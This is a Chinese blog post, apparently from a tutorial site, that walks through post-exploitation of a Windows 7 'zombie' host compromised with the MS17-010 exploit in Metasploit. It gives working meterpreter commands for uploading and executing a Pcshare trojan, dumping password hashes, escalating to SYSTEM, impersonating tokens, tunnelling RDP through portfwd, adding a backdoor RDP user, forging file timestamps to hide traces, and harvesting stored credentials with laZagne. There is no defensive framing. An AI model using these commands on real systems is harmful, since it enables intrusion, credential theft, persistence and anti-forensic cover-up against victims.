美文网首页
Ten 对肉鸡后期攻击

Ten 对肉鸡后期攻击

作者: _Beginner | 来源:发表于2020-03-10 17:07 被阅读0次

    一.准备及介绍

    1、本文介绍对win7肉鸡(未开防火墙)进行上下载文件等控制。

    2、环境:win7、MSF、Pcshare


    二. meterpreter后期攻击使用方法

    1、使用Pcshare制作好木马(1.exe)后;SSH连接kali,打开MSF使用MS17-010(永恒之蓝)后:rz(把制作好的木马文件传到kali)

    然后exploit;用(upload <file> <destination>):1)upload (-f) 1.exe c://inetpub(inetpub文件夹必须存在,否则会上传失败)。

     2)download <file> <path to save> :download c://17010.txt //root//csa 。

    2、execute -f c://inetpub//1.exe(若文件有空格,路径需要加双引号)

    3、ps(查看进程)、hashdump(转储所有账号的hash密码)、getsystem(命令可以提权到本地系统权限)

    4、1)portfwd命令是转发技术中最常用的一个命令,可以让攻击系统访问本来无法直接访问的目标主机。

           2)add选项会将端口转发添加到列表中,而且本质上会创建一个隧道。

           3)portfwd add -l 6666 -p 3389 -r 127.0.0.1 #将目标机的3389端口转发到本地6666端口

                4)删除端口转发:portfwd delete -l <portnumber> -p <portnumber> -r <Target IP>

    5、在目标主机上搜索文件:(search -f  *.txt)、获取用户ID(getuid)、获取系统信息(sysinfo)

    6、1)模拟任意用户(token操作):use incognito

          2)list_tokens -u来显示所有有效的tokens

          3)impersonate_token "NT AUTHORITY\NETWORK SERVICE"

    7、timestomp伪造时间戳。

                    timestomp C:// -h   #查看帮助

                    timestomp -v C://2.txt   #查看时间戳

                    timestomp C://2.txt -f C://1.txt #将1.txt的时间戳复制给2.txt

    8、enable_rdp脚本开启3389:run post/windows/manage/enable_rdp  #开启远程桌面

    run post/windows/manage/enable_rdp USERNAME=www2 PASSWORD=123456 #添加用户

    run post/windows/manage/enable_rdp FORWARD=true LPORT=6662  #将3389端口转发到6662

    脚本位于/usr/share/metasploit-framework/modules/post/windows/manage/enable_rdp.rb

    通过enable_rdp.rb脚本可知:开启rdp是通过reg修改注册表;添加用户是调用cmd.exe 通过net

    user添加;端口转发是利用的portfwd命令

    9、使用laZagne查看账号密码:laZagne all >>23.txt 。

    相关文章

      网友评论

          本文标题:Ten 对肉鸡后期攻击

          本文链接:https://www.haomeiwen.com/subject/ioawdhtx.html